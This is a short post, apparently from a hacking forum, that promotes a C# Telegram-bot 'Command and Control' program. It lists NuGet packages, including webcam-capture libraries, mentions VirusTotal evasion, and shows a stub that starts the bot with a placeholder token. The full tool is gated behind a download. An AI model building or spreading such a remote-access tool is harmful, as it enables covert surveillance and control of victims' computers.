11 Years of Service
18%

Command and Control for C# Writing
Author: Leiothrix
VirusTotal check result
Don't pass it on to Virus Total anymore. He tried for you.

Install
Nuget download these package
using System.IO;
using Telegram.Bot;
using Telegram.Bot.Args;
using Telegram.Bot.Types.InputFiles;
using AForge.Video;
using AForge.Controls;
using AForge.Video.DirectShow;
Add related classes in 'References'
System.Drawing;
System.Windows.Forms;
How to used

Modify your Token to the program
Code:
static void Main(){
botClient = new TelegramBotClient("token"); //Your Token
botClient.OnMessage += Bot_OnMessage;
botClient.StartReceiving();
Thread.Sleep(int.MaxValue);
}
More info & Download
To see this hidden content, you must like this content.